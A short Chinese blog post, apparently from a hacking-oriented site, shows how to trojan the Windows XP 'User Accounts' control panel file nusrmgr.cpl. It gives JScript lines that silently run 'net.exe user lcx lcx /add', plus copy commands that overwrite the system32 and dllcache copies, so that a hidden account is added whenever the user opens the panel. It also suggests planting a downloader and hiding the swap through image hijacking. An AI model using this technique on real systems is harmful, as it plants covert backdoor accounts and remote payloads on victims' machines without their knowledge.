本文揭示了Windows XP中“用户账户”控制面板项是由HTA文件实现的事实,并提供了一个示例,展示如何通过修改NUSRMGR.HTA文件来自动创建新用户账户。
先请看图:
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。
看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)
我们在里边加几行js语句:
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)
当然你加下载者更好,我只是做个示例。
然后:
echo y|copy nusrmgr.cpl c:/windows/system32/dllcache/nusrmgr.cpl
echo y|copy nusrmgr.cpl c:/windows/system32/nusrmgr.cpl
替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。
这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
